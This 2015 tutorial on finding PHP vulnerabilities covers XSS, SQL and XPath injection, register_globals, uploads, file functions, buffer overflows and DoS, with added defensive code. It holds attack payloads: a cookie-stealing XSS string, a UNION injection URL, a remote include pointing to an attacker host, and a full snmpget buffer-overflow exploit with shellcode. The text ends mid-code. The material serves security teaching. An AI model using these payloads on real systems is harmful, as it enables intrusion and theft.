21 Oct 2015
Finding Bugs in PHP Systems
Introduction
This document covers vulnerabilities in PHP systems, organized by the functions and variables that cause them.
We classify them this way because many of our friends have difficulty finding and recognizing them in PHP code.
The aim is to help you locate and identify the bug.
Phase 1
In PHP systems, first look for the following variables in the source code:
Kod:
$_SERVER
$_GET
$_POST
$_COOKIE
$_REQUEST
$_FILES
$_ENV
// Legacy long-form names (deprecated in PHP 5.3, removed in 5.4), still found in old code:
$HTTP_COOKIE_VARS
$HTTP_ENV_VARS
$HTTP_GET_VARS
$HTTP_POST_FILES
$HTTP_POST_VARS
$HTTP_SERVER_VARS
Why? Because these are the superglobal arrays through which user input enters a PHP application.
For example, if the password field of the admin login form arrives in $_POST, that is the variable whose use we need to trace through the code.
Input that is used without validation is what creates the weakness in the system.
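As an added example (not code from the original post), here is a small scanner for the Phase 1 step: it reports where the input superglobals are read, using PHP's own tokenizer so that a mention inside a comment is not counted. The source it scans is constructed inline.

```php
<?php
// Added example, not from the original post: a scanner for the Phase 1 step above. It
// reports where the input superglobals are read, using PHP's tokenizer so that a
// mention inside a comment is not counted. The source it scans is constructed.

$sources = [
    '$_GET', '$_POST', '$_COOKIE', '$_REQUEST', '$_FILES', '$_SERVER', '$_ENV',
    '$HTTP_GET_VARS', '$HTTP_POST_VARS', '$HTTP_COOKIE_VARS', '$HTTP_SERVER_VARS',
    '$HTTP_ENV_VARS', '$HTTP_POST_FILES',
];

// Returns [ ['line' => n, 'var' => '$_GET'], ... ] for every read of an input variable
function findInputSources(string $code, array $sources): array {
    $hits = [];
    foreach (token_get_all($code) as $tok) {
        // Variable tokens arrive as [T_VARIABLE, text, line]; punctuation arrives as plain strings
        if (is_array($tok) && $tok[0] === T_VARIABLE && in_array($tok[1], $sources, true)) {
            $hits[] = ['line' => $tok[2], 'var' => $tok[1]];
        }
    }
    return $hits;
}

// Constructed sample source: one read inside a comment, two real reads
$sample = <<<'PHP'
<?php
// $_GET is mentioned here, but only in a comment
$id = $_GET['id'];
$ua = $_SERVER['HTTP_USER_AGENT'];
$q  = "SELECT * FROM users WHERE id = $id";
PHP;

foreach (findInputSources($sample, $sources) as $hit) {
    printf("line %d: %s\n", $hit['line'], $hit['var']);
}
```

Run it on a real file by passing file_get_contents() of that file instead of the constructed sample. The comment on line 2 of the sample is skipped and only the $_GET and $_SERVER reads on lines 3 and 4 are reported; those reads are the places to start the review from.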
Now we're going to go through them one by one.
__________________________________________________ _____________
Cross Site Scripting Vulnerability (XSS)
XSS is a client-side vulnerability.
The attack is carried out against the user: JavaScript injected into a web page runs in the victim's browser, in the context of the vulnerable site.
Many site owners are unaware of this vulnerability, and every browser executes JavaScript, which is enough to explain why XSS is so common.
So how does it happen?
It is basically the result of user input being written into HTML output without escaping, so the input can introduce its own tags.
Example:
Kod:
<?php
// Reflected XSS: the query parameter is printed straight into the page
$xss = $_GET['alco'];
print $xss;
?>
The variable is printed without any escaping.
Sample attack module:
Kod:
#http://127.0.0.1:80/index.php?alco="><scr ipt>alert(********.cookie);</script>
Defense
Abuse of HTML tags has to be prevented, which means escaping the value before it is printed.
Therefore we use the htmlspecialchars function; pass ENT_QUOTES so that single quotes are escaped as well, since the default flags leave them alone on PHP versions before 8.1:
Kod:
<?php
$xss = $_GET['alco'];
// Converts < > & " ' to entities, so the browser renders them as text instead of markup
print htmlspecialchars($xss, ENT_QUOTES, 'UTF-8');
?>
__________________________________________________ _____________
SQL Injection Vulnerability
SQL Injection is a server-side vulnerability, unlike XSS.
SQL Injection vulnerabilities are caused by user input that is not validated before it reaches a query.
You will ask: what is the difference from XSS, which is also due to a lack of filtering? The answer is where the payload ends up:
SQL Injection: the unfiltered data goes into the query sent to the database, so it executes on the server.
XSS: WEB APPLICATION > USER > BROWSER > USER (the payload runs on the client)
SQL: WEB APPLICATION > USER > DATABASE > USER (the payload runs on the server)
That is the shape it takes.
Example:
Kod:
<?php
$id = $_GET['id'];
....
// The id is concatenated into the query with no validation
$query = "SELECT * FROM users WHERE id = " . $id . ";";
...
?>
The id variable is not validated at all. Append a single quote to it and the database returns an error, which confirms the injection.
Sample attack module:
Kod:
#http://127.0.0.1:80/index.php?id=1+UNION+SELECT+1,@@version,3,4,5+from+users/*
Defense
Here the approach is to ban the characters used in SQL Injection, such as + (plus) and ; (semicolon):
Kod:
<?php
$id = $_GET['id'];
....
// Blacklist of characters to strip (yasak = "forbidden")
$yasak = array("\"", "\\", "/", "*", "'", "=", "-", "#", ";", "<", ">", "+", "%");
$id = str_replace($yasak, "", $id);
$query = "SELECT * FROM users WHERE id = " . $id . ";";
...
?>
The array collects the forbidden characters and str_replace() removes them from the id before it is used.
Be aware that this is a blacklist, and it does not even stop the attack module above: PHP decodes the + signs in the query string to spaces before the script runs, and spaces are not in the list, so after filtering the query still reads 1 UNION SELECT 1,@@version,3,4,5 from users (only the /* is stripped). The robust fix is to validate the type, for example by casting the id with (int), or to use prepared statements, so that the value never becomes part of the SQL text.
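The following is an added example, not code from the original post: it runs the page's character blacklist and a prepared statement against the attack module's input. It uses an in-memory SQLite database through PDO (pdo_sqlite is assumed to be available) with a constructed users table so it runs offline, and the injected SELECT is adapted to SQLite, which has no @@version.

```php
<?php
// Added example, not from the original post: the character blacklist above versus a
// prepared statement, run against the attack module's input. Uses an in-memory SQLite
// database (pdo_sqlite, assumed available) with a constructed users table, so the
// script runs offline; the injected SELECT is adapted to SQLite, which has no @@version.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER, name TEXT, password TEXT)');
$pdo->exec("INSERT INTO users VALUES (1, 'kayra', 'secret1'), (2, 'kasva', 'secret2')");

// The page's defense: strip forbidden characters, then concatenate
function blacklistFilter(string $id): string {
    $yasak = ['"', '\\', '/', '*', "'", '=', '-', '#', ';', '<', '>', '+', '%'];
    return str_replace($yasak, '', $id);
}

function lookupWithBlacklist(PDO $pdo, string $id): array {
    $id = blacklistFilter($id);
    $sql = "SELECT id, name FROM users WHERE id = $id";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: type check plus a bound parameter; the value never becomes SQL text
function lookupPrepared(PDO $pdo, string $id): array {
    if (!ctype_digit($id)) {
        return [];   // an id is a non-negative integer; anything else is rejected
    }
    $stmt = $pdo->prepare('SELECT id, name FROM users WHERE id = ?');
    $stmt->execute([(int) $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// What $_GET['id'] holds once PHP has decoded the attack URL: the + signs are already
// spaces, so the blacklist has nothing to remove
$attack = '1 UNION SELECT id, password FROM users';

print_r(lookupWithBlacklist($pdo, $attack));
print_r(lookupPrepared($pdo, $attack));
print_r(lookupPrepared($pdo, '1'));
```

The first call returns the password column for every user alongside the legitimate row, because the filtered string is still a valid UNION. The second returns nothing, since a string containing spaces and letters is not a digit string, and the third returns the single expected row.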
__________________________________________________ _____________
Dynamic Evaluation Vulnerability
It is a vulnerability class that arises from misuse of PHP's ability to call a function by a name held in a variable.
Example:
Kod:
<?php
// The function name comes straight from the request and is called as-is
$fonksiyon = $_GET['fonksiyon'];
$fonksiyon();
?>
Note how the function is called: the name is whatever the request supplied.
Sample Attack Module:
Kod:
#http://127.0.0.1:80/index.php?fonksiyon=phpinfo
And the phpinfo() output appears on our page.
Defense
These bugs come from coders who do not know about this behaviour of PHP.
Never call a function by a name taken from input; the same applies to passing input to call_user_func() or eval().
You may face big problems, so call functions by a fixed name and treat the request value as data only:
Kod:
<?php
function fonksiyon()
{
    // The request value is data to print, never a function name
    $fonksiyon = $_GET['fonksiyon'] ?? '';
    print htmlspecialchars($fonksiyon, ENT_QUOTES, 'UTF-8');
}
fonksiyon();
?>
That is the form it should take.
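When the request really must select an operation, the safe pattern is an allowlist. The following is an added example and not code from the original post; the two action functions and the request values fed to it are constructed for the demo.

```php
<?php
// Added example, not from the original post: when the request really must choose an
// action, dispatch through a fixed allowlist. Only names in ACTIONS can ever be called,
// so ?fonksiyon=phpinfo (or any other built-in) is rejected. The action functions and
// the request values at the bottom are constructed for the demo.

function showHelp(): string    { return 'help text'; }
function showVersion(): string { return 'version 1.0'; }

// Request value => the one function it is permitted to reach
const ACTIONS = [
    'help'    => 'showHelp',
    'version' => 'showVersion',
];

function dispatch(string $requested): string {
    if (!array_key_exists($requested, ACTIONS)) {
        return 'unknown action';   // anything not in the map stops here
    }
    $fn = ACTIONS[$requested];     // a value from our own table, never from the request
    return $fn();
}

foreach (['help', 'phpinfo', 'system'] as $requested) {   // stands in for $_GET['fonksiyon']
    printf("%-8s -> %s\n", $requested, dispatch($requested));
}
```

The request value is only ever used as a key into a table the application owns; the callable itself always comes from that table.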
__________________________________________________ _____________
Register Globals Vulnerability
register_globals is a PHP configuration option that is sometimes convenient and very dangerous.
How does it work?
As you know, we normally read input through $_POST and $_GET in our PHP applications.
With register_globals on, every input name is assigned directly to a variable of the same name, without going through $_POST or $_GET, so you write less code.
However, use this only if you fully trust your PHP application. Why?
Because anyone can set the variables it creates to whatever they wish. register_globals has defaulted to off since PHP 4.2.0, was deprecated in 5.3.0 and removed in 5.4.0.
Example:
Kod:
<?php
// $admin is never initialized; with register_globals on, ?admin=1 creates it
if (isset($admin)) {
    // Welcome to the admin panel!
    [...]
} else {
    // Wrong login!
    [...]
}
?>
How do we attack? Since the variable is assigned directly to the input, we can determine its value.
Sample Attack Module:
Kod:
#http://127.0.0.1:80/admin.php?admin=1
And the admin panel will open. So how do we close this deficit?
Defense:
Keep register_globals off at all times.
And in the code itself, initialize every variable before it is used and set it only from your own checks, so an injected value cannot stand in for a missing one (note that isset() would not help here, because an initialized variable is always set):
Kod:
<?php
$is_admin = false;   // known value before any check runs
[...]                // credential check; sets $is_admin = true on success only
if ($is_admin === true) {
    // Welcome to the admin panel!
    [...]
} else {
    // Wrong login!
    [...]
}
?>
Example:
When register_globals is on, we can shape any uninitialized variable, so many kinds of vulnerability can arise.
Kod:
<?php
// $path is not set anywhere; with register_globals on it comes from the request
include "$path/kasva.php";
?>
Let's shape the $path input above so that include() fetches our own file (a remote URL works only where remote includes are permitted: allow_url_fopen before PHP 5.2, allow_url_include since).
Sample Attack Module:
Kod:
#http://127.0.0.1:80/index.php?path=http://shelliniz.org/?
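register_globals is gone since PHP 5.4, but calling extract() on request data recreates exactly the same bug, so the following added example (not code from the original post) shows the admin check above that way. Both functions take a constructed request array instead of reading $_GET, and the stored password hash is constructed too, so the script runs from the command line.

```php
<?php
// Added example, not from the original post: register_globals is gone since PHP 5.4,
// but calling extract() on request data recreates the same bug, so the pattern is
// shown that way here. Both functions take a constructed request array instead of
// reading $_GET, so the script runs from the command line.

// Same shape as the page's example: $admin is never initialized, so any request that
// carries admin=1 brings it into existence
function checkAdminVulnerable(array $request): bool {
    extract($request);
    return isset($admin);
}

function checkAdminFixed(array $request, string $passwordHash): bool {
    $admin = false;                               // 1. initialize before use
    $password = $request['password'] ?? '';       // 2. read input explicitly, by key
    if (password_verify($password, $passwordHash)) {
        $admin = true;                            // 3. only our own check can set it
    }
    return $admin === true;
}

$hash   = password_hash('correct horse', PASSWORD_DEFAULT);   // stored credential (constructed)
$forged = ['admin' => '1'];                                   // the ?admin=1 request
$legit  = ['password' => 'correct horse'];

var_dump(checkAdminVulnerable($forged));
var_dump(checkAdminFixed($forged, $hash));
var_dump(checkAdminFixed($legit, $hash));
```

The forged request opens the vulnerable check and is refused by the fixed one; only the request carrying the right password passes the fixed check.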
__________________________________________________ _____________
File Upload Vulnerability
Shell upload vulnerabilities come from upload handlers in PHP systems that do not check file types properly.
We can upload our own PHP code to an application that is meant to accept only image files.
Example:
Kod:
<?php
....
// 'type' is the Content-Type the client sent with the upload; it is not derived from the file
if ($_FILES['userfile']['type'] != "image/gif") {
....
}
?>
The test != "image/gif" above means that only GIF uploads are accepted.
But the file extension is not checked, and the type is not derived from the file either: 'type' is the MIME type the browser put into the multipart request, and the attacker controls it. File type and extension are very different things.
So how do we exploit it? We send our PHP file with the Content-Type of the upload part set to image/gif.
If the server also inspects the content, put the GIF signature on the first line of the PHP file: the bytes GIF89a (or GIF87a). Note that the real signature ends in a lowercase a.
And you will see that the PHP file has been uploaded.
Defense
We can put up a filter barrier by banning dangerous file extensions:
Kod:
$yasak = array(".php", ".phtml", ".php3", ".php4");
That blocks those extensions, but a blacklist misses whatever it does not list (for example .phar or .php5, if the server maps them to PHP), so it is safer to allow only the extensions you expect. At the same time, we can forbid access to the /upload folder:
(Use a .htaccess file in the folder with Deny from all on Apache 2.2, or Require all denied on Apache 2.4; if the files must stay viewable, disable script execution there instead, for example with php_flag engine off under mod_php.)
Most importantly, we can give uploaded files a random name.
This way, even if a PHP file gets uploaded, it cannot be reached: the folder is forbidden and the name is unguessable.
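As an added example (not code from the original post), here is an upload handler that applies the three defenses above and does not trust the client-supplied type or name: an extension allowlist, the MIME type detected from the file's bytes, and a random stored name. It assumes an uploads directory outside the web root (the $uploadDir argument is a placeholder), and the demo at the bottom builds two temporary files instead of a real upload so it runs from the command line.

```php
<?php
// Added example, not from the original post: validate an upload by its real content and
// store it under a random name. Assumes an uploads directory outside the web root (the
// $uploadDir argument is a placeholder). The demo at the bottom builds two temporary
// files instead of a real upload, so it runs from the command line.

const ALLOWED = ['gif' => 'image/gif', 'png' => 'image/png', 'jpg' => 'image/jpeg'];

// Returns the extension to store the file under, or null if the upload is rejected
function validateUpload(array $file): ?string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // The client-supplied name is used only to pick an allowlisted suffix
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        return null;
    }
    // MIME type from the bytes on disk; $file['type'] came from the client and is ignored
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($detected !== ALLOWED[$ext]) {
        return null;
    }
    return $ext;
}

function storeUpload(array $file, string $uploadDir): ?string {
    $ext = validateUpload($file);
    if ($ext === null) {
        return null;
    }
    // Random name: the attacker never controls what the file is called on disk.
    // A valid image can still carry PHP code in its comment block, so the directory
    // must also be served without script execution.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $stored;
    return move_uploaded_file($file['tmp_name'], $dest) ? $stored : null;
}

// Constructed demo: a real GIF header versus a PHP file whose client-side name and type claim GIF
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, "GIF89a" . str_repeat("\0", 16));
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, "<?php phpinfo(); ?>");
foreach ([$gif, $php] as $tmp) {
    $upload = ['name' => 'x.gif', 'type' => 'image/gif', 'tmp_name' => $tmp, 'error' => UPLOAD_ERR_OK];
    var_dump(validateUpload($upload));
}
unlink($gif);
unlink($php);
```

The first file passes the content check and would be stored as a .gif; the second is rejected because libmagic identifies it as PHP source regardless of the image/gif the client claimed. storeUpload() is the function to call from the real form handler, since move_uploaded_file() only accepts files that arrived through an HTTP upload.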
__________________________________________________ _____________
Xpath Injection(XML FUNCTIONS) Vulnerability
XPath Injection is another kind of injection, very similar to SQL Injection.
In SQL Injection the target is the SQL database; in XPath Injection it is an XML document queried with XPath.
To detect the vulnerability, first find the input fields whose values end up in XPath queries.
Example:
Kod:
<?php
$test = $_GET['test'];
if ($test) {
    $xml = simplexml_load_file("kasva.xml");
    // The request value is used as the whole XPath expression
    $result = $xml->xpath($test);
    print_r($result);
}
?>
Note the xpath() call above: the query sent to kasva.xml is taken straight from the request.
Now let's look at this XML file:
Kod:
<?xml version="1.0" encoding="UTF-8"?>
<note>
<to>kayra</to>
<from>kasva</from>
<heading>Reminder</heading>
<body>I love you, kayra!</body>
</note>
Note the tag names in the XML file.
Now let's send queries through our PHP file:
Kod:
index.php?test=from
#Array ( [0] => SimpleXMLElement Object ( [0] => kasva ) )
index.php?test=*
#Array ( [0] => SimpleXMLElement Object ( [0] => kayra ) [1] => SimpleXMLElement Object ( [0] => kasva ) [2] => SimpleXMLElement Object ( [0] => Reminder ) [3] => SimpleXMLElement Object ( [0] => I love you, kayra! ) )
Yes, every element of the XML file is returned.
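The case above hands the attacker the whole expression; the more usual shape is a value pasted into a fixed query, such as a login check. The following added example (not code from the original post) shows that check, the injection that bypasses it, and a quoting helper. PHP's XPath API has no bound parameters, so the fix is to turn each value into an XPath string literal that cannot close its own quotes. The user list is constructed inline.

```php
<?php
// Added example, not from the original post: an XPath login check, the injection that
// bypasses it, and a quoting helper. PHP's XPath API has no bound parameters, so the
// fix is to turn each value into an XPath string literal that cannot close its own quotes.
// The user list is constructed inline.

$xmlText = <<<'XML'
<users>
  <user><name>kayra</name><pass>secret1</pass></user>
  <user><name>kasva</name><pass>secret2</pass></user>
</users>
XML;
$users = simplexml_load_string($xmlText);

// Vulnerable: request values are pasted into the expression
function loginVulnerable(SimpleXMLElement $xml, string $name, string $pass): bool {
    $r = $xml->xpath("//user[name='$name' and pass='$pass']");
    return is_array($r) && count($r) > 0;
}

// Build an XPath string literal for arbitrary input. A value with both quote kinds is
// split on the single quotes and rejoined with concat(), so no input can end the literal.
function xpathLiteral(string $s): string {
    if (strpos($s, "'") === false) {
        return "'" . $s . "'";
    }
    if (strpos($s, '"') === false) {
        return '"' . $s . '"';
    }
    $parts = array_map(function ($p) { return "'" . $p . "'"; }, explode("'", $s));
    return 'concat(' . implode(', "\'", ', $parts) . ')';
}

function loginFixed(SimpleXMLElement $xml, string $name, string $pass): bool {
    $r = $xml->xpath('//user[name=' . xpathLiteral($name) . ' and pass=' . xpathLiteral($pass) . ']');
    return is_array($r) && count($r) > 0;
}

$bypass = "' or '1'='1";   // classic payload in the password field
var_dump(loginVulnerable($users, 'kayra', $bypass));
var_dump(loginFixed($users, 'kayra', $bypass));
var_dump(loginFixed($users, 'kayra', 'secret1'));
```

In the vulnerable version the payload turns the predicate into (name='kayra' and pass='') or '1'='1', which matches every user, so the login succeeds without a password. The fixed version wraps the same payload in double quotes and it matches nothing; the real password still works.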
__________________________________________________ _____________
Hidden Form Manipulation Vulnerability
This type of vulnerability can occur on any page that carries user data from one step to the next in hidden form fields.
We can inject code by manipulating hidden form fields. How can this happen?
Many web programmers do filter characters such as > and < when writing these fields, to block injection.
However, the filter has to run before the data is placed into the hidden form, not after. Therefore:
DATA > HIDDEN FORM > FILTER: this order creates the vulnerability.
DATA > FILTER > HIDDEN FORM: safe to use.
So on what kind of pages are these bugs found? For example, in multi-step admin logins, where the user name is carried from one step to the next in hidden fields:
User login > HIDDEN FORM > Admin login > HIDDEN FORM > Administrator
Example:
Let's look at a sample usage:
Kod:
<form>
<input type="hidden" name="username" value="kasva" >
</form>
What happens if we enter "> kasva instead of a user name in the form above? Let's look:
Kod:
<form>
<input type="hidden" name="username" value=""> kasva">
</form>
As you can see, the value is now empty and the rest of our input spills out of the tag as page text. Note that the "> already present in the page closes our injection for us, so we do not need to supply a closing > at the end ourselves.
Now let's inject our XSS code the same way, using "><script>alert(document.cookie)</script><a name=" as the user name so that the page's own "> closes the final tag. The result:
Kod:
<form>
<input type="hidden" name="username" value=""><script>alert(document.cookie)</script><a name="">
</form>
And the cookie pops up in the browser.
Defense
Do not place unfiltered data into hidden form fields! Escape the value with htmlspecialchars() and ENT_QUOTES before writing it into the value attribute, so that a double quote in the input cannot end the attribute.
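The following added example (not code from the original post) serves both the XSS section and this hidden form section. The escaping that is safe depends on where the untrusted value lands: htmlspecialchars() covers HTML text and quoted attributes, including a hidden field's value, but a value placed inside a script block needs JSON encoding instead. The payload it renders is constructed in the style of the attack above.

```php
<?php
// Added example, not from the original post; it serves both the XSS section and the
// hidden form section above. The escaping that is safe depends on where the untrusted
// value lands: htmlspecialchars() covers HTML text and quoted attributes (including a
// hidden field's value), but a value inside a <script> block needs JSON encoding.

function escapeHtml(string $s): string {
    // ENT_QUOTES escapes both quote styles, so the result is safe inside "..." and '...'
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function escapeJs(string $s): string {
    // JSON literal with <, >, &, and quotes hex-escaped, so "</script>" cannot end the block
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Renders the same user-controlled value in the three contexts, escaped for each
function renderStep(string $username): string {
    return '<p>Welcome, ' . escapeHtml($username) . "</p>\n"
         . '<form><input type="hidden" name="username" value="' . escapeHtml($username) . "\"></form>\n"
         . '<script>var user = ' . escapeJs($username) . ";</script>\n";
}

// Constructed payload in the style of the hidden form attack above
$payload = '"><script>alert(document.cookie)</script><a name="';
echo renderStep($payload);
```

In the output every <, > and " in the first two lines is an entity, so the hidden field's value attribute stays closed, and the script line holds a JSON string literal rather than a tag. Using escapeHtml() inside the script block would not be enough, because entities are not decoded there.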
__________________________________________________ _____________
Backup Files Download Vulnerability
It is an annoying vulnerability, even if it does not look like much.
Novice web programmers pick "random" names when storing backup files.
Example:
Kod:
<?php
$rnd = rand(1, 100);
// The backup name has only 100 possible values
$fp = fopen($rnd . "_backup_.sql", "w");
fwrite($fp, $db);
fclose($fp);
?>
The rand() call gives a number between 1 and 100, and the fopen() call uses it to name the backup file: <number>_backup_.sql.
So with at most 100 requests, a brute-force over the names finds the backup file. (rand() is not a cryptographic generator either; a backup should get a long name from random_bytes() and live outside the web root.)
Even though it is an underrated bug, it turns up in important scripts:
See: PHP-Fusion 6.00.105 Accessible Database Backups Download Vulnerability
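As an added example (not code from the original post), here is the same backup writer hardened: the name comes from random_bytes(), the file is created without overwriting anything, and its permissions are restricted. $backupDir is a placeholder for a directory outside the web root, and the dump content is constructed.

```php
<?php
// Added example, not from the original post: rand(1, 100) yields at most 100 file names,
// so the backup above is found by requesting each one. This version names the file from
// random_bytes(), refuses to overwrite, and restricts permissions. $backupDir is a
// placeholder for a directory outside the web root; the dump content is constructed.

// Every name the original code could possibly produce
function guessableBackupNames(): array {
    $names = [];
    for ($i = 1; $i <= 100; $i++) {
        $names[] = $i . '_backup_.sql';
    }
    return $names;
}

function writeBackupSafely(string $dump, string $backupDir): string {
    // 128 bits from the CSPRNG: not enumerable, unlike rand(1, 100)
    $name = 'backup_' . bin2hex(random_bytes(16)) . '.sql';
    $path = rtrim($backupDir, '/') . '/' . $name;
    // Mode 'x' creates the file and fails if it already exists, so nothing is clobbered
    $fp = fopen($path, 'x');
    if ($fp === false) {
        throw new RuntimeException("could not create $path");
    }
    fwrite($fp, $dump);
    fclose($fp);
    chmod($path, 0600);   // owner (the PHP process user) only
    return $path;
}

$dir  = sys_get_temp_dir();   // stands in for the out-of-webroot backup directory
$path = writeBackupSafely("-- constructed dump\nCREATE TABLE t (id INT);\n", $dir);
printf("%d guessable names versus %s\n", count(guessableBackupNames()), basename($path));
unlink($path);
```

The name is still not a substitute for keeping the directory out of the document root and denying web access to it; it only removes the enumeration shortcut.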
__________________________________________________ _____________
File Management Vulnerability
There are many file management functions in PHP.
A lazy programmer does not validate the input that names the files those functions operate on.
When that happens, third parties can reach your files remotely.
Example:
Kod:
<?php
// The source path comes from the request; the destination is inside the web root
$file = $_GET['cpFile'];
$newfile = "/usr/local/www/html/tmp/file.php";
if (!copy($file, $newfile)) {
    echo "Sorry, could not copy: $file...\n";
} else {
    echo "Copy succeeded.";
}
?>
An attacker who sends cpFile=/etc/passwd has the server copy /etc/passwd into the web-accessible tmp/file.php and then reads it through the browser. Because copy() also accepts URL wrappers, the same request with a remote URL plants the attacker's own PHP file in the web root.
Some other functions that take a path and are exposed in the same way:
Kod:
rmdir
unlink     // PHP has no delete(); unlink() is the function that removes a file
fopen / fwrite
Defense
Validate the path before use: allow only known file names or extensions, resolve it with realpath() and check that it stays inside the directory you expect, and reject URL wrappers. This is entirely in the coder's hands.
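The following added example (not code from the original post) confines a user-supplied file name to one directory before it reaches copy(), unlink(), include() or any other file function; it applies equally to the include "$path/kasva.php" case in the register_globals section above. $baseDir is a placeholder for the application's own data directory, and the demo builds a temporary sandbox directory so it runs offline.

```php
<?php
// Added example, not from the original post: confine a user-supplied file name to one
// directory before passing it to copy(), unlink(), include() or any other file function.
// $baseDir is a placeholder for the application's own data directory.

function resolveInside(string $baseDir, string $userPath): ?string {
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Refuse URL wrappers outright (copy() and include() accept http://, php://, ...)
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $userPath)) {
        return null;
    }
    // realpath() resolves ../ and symlinks; the target must exist and sit under $base
    $target = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($target === false || strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo: a sandbox directory holding one legitimate file
$sandbox = sys_get_temp_dir() . '/sandbox_' . bin2hex(random_bytes(4));
mkdir($sandbox);
file_put_contents("$sandbox/report.txt", "ok\n");

$attempts = [
    'report.txt',                         // legitimate
    '../../../../etc/passwd',             // traversal out of the sandbox
    '/etc/passwd',                        // absolute path
    'php://filter/resource=report.txt',   // wrapper
];
foreach ($attempts as $p) {
    $r = resolveInside($sandbox, $p);
    printf("%-36s -> %s\n", $p, $r === null ? 'rejected' : 'allowed');
}
unlink("$sandbox/report.txt");
rmdir($sandbox);
```

Only report.txt resolves; the traversal resolves to a real path outside the sandbox and fails the prefix check, the absolute path does not exist under the base, and the wrapper is refused before any filesystem call.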
__________________________________________________ _____________
Buffer Overflows Vulnerability
It turns up in web applications, but it is a difficult vulnerability to exploit.
It stems from code that does not check the length of user-supplied data before storing it into a fixed-size buffer. In a PHP application that code is not the PHP script itself but the C code of the interpreter or an extension; the script is just the path the oversized input takes.
So how do we find it in practice?
We can look for MAXLENGTH attributes on input fields, or strip the JavaScript checks out of the HTML source, since both only limit what the browser sends, not what the server accepts.
Doing this by hand takes a lot of time.
So what do we do? We need a tool that sends long or random strings to these inputs.
We can then tell from the HTTP status codes (for example a 500) whether one of our inputs crashed the application.
One tool used for this in penetration testing:
firefuzzer - A Penetration Testing tool intended to find vulnerabilities in Web Pages especially Buffer Overflow and XSS - Google Project Hosting
With it you can detect buffer overflow conditions, especially on login pages.
Example:
Buffer overflows occur when the PHP programmer uses functions whose C implementation has had such bugs in specific PHP versions, for example:
Kod:
confirm_phpdoc_compiled
mssql_pconnect
mssql_connect
crack_opendict
snmpget
ibase_connect
For example, snmpget() has had a buffer overflow:
Kod:
<?php
$host    = $_GET['host'];
$timeout = $_GET['timeout'];
// snmpget() takes (hostname, community, object_id, ...), so the value named $timeout
// here actually lands in the community-string parameter; neither value is length-checked
$syscontact = snmpget($host, $timeout, "system.sysContact.0");
?>
The user-supplied strings from $_GET are handed to the extension without any length check, and the overflow happens inside it.
By exploiting it the attacker can execute arbitrary code.
Exploit:
Kod:
<?php
if (!extension_loaded("snmp")) {
    die("the snmp extension must be loaded");
}
$____scode =
"\xeb\x1b".
"\x5b".
"\x31\xc0".
"\x50".
"\x31\xc0".
"\x88\x43\x59".
"\x53".
"\xbb\x6d\x13\x86\x7c". // address of WinExec
"\xff\xd3".
"\x31\xc0".
"\x50".
"\xbb\xda\xcd\x81\x7c".
"\xff\xd3".
"\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64".
"\x2e".
"\x65".
"\x78\x65".
"\x20\x2f".
"\x63\x20".
"start notepad & ";
$edx = "\x64\x8f\x9b\x01"; // jmp scode
$eip = "\x73\xdc\x82\x7c"; // 0x7C82DC73 jmp edx
// Payload layout: padding, value for edx, more padding, return address, NOP sled, shellcode
$____suntzu = str_repeat("A", 188) . $edx . str_repeat("A", 64) . $eip . str_repeat("\x90", 48) . $____scode . str_repeat("\x90", 48);
$curl = curl_init();
// Send the payload as the timeout parameter
curl_setopt($curl, CURLOPT_URL, "http://target.com/snmp.php?host=127.0.0.1&timeout=$____suntzu");
curl_exec($curl);
curl_close($curl);
?>
Defense
Keep your PHP version and its extensions up to date! The overflow is in the extension's C code, so no filtering in the script fixes it, though checking strlen() of inputs before passing them on limits the exposure.
__________________________________________________ _____________
Denial of Service Vulnerability
It is difficult for a web application to tell whether a user is attacking it or just sending normal requests.
It can use the IP address for this, but determining the exact identity of someone from an IP address is beyond what a web application can do.
What does this have to do with DoS? Send a continuous stream of requests from one computer to a server and you will see.
I will try to show you the most common type of DoS weakness encountered:
Example:
Kod:
<?php
//....
$user_mode = $_SERVER['HTTP_USER_AGENT'];
$user_ip   = $_SERVER['REMOTE_ADDR'];   // SERVER_ADDR would be the server's own address
// The header is also unescaped here (see SQL Injection above)
$sql = "INSERT INTO tbl_name (..) VALUES ('$user_mode', '$user_ip');";
// MySQL writes a separate row for every request
//..
?>
Above, a row is written for every request. Applications like this store the browser string and other junk about the user in the database on every hit.
An attacker exploits this very simply: a flood of requests fills the table and the disk, and MySQL slows down or stops.
This is not limited to MySQL:
bandwidth, database connections, disk storage, CPU, memory, threads, application logs...
Defense
Only store what the application actually needs, bound the size of what you store, and limit how many requests a single client may make in a given time.
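As an added example (not code from the original post), here is a per-client request limiter for an endpoint like the logging code above, together with a bound on what gets stored. The counter store is an in-memory array so the script runs offline; in production the same logic would use a shared store such as APCu or Redis, which is an assumption and not something the post specifies. The clock and client address are constructed.

```php
<?php
// Added example, not from the original post: a per-client request limiter for an
// endpoint like the logging code above, plus a bound on what gets stored. The counter
// store is an in-memory array so the script runs offline; in production the same logic
// would use a shared store such as APCu or Redis (an assumption, not from the post).

class FixedWindowLimiter {
    private $limit;
    private $windowSeconds;
    private $counters = [];   // client key => [window start, count]

    public function __construct(int $limit, int $windowSeconds) {
        $this->limit = $limit;
        $this->windowSeconds = $windowSeconds;
    }

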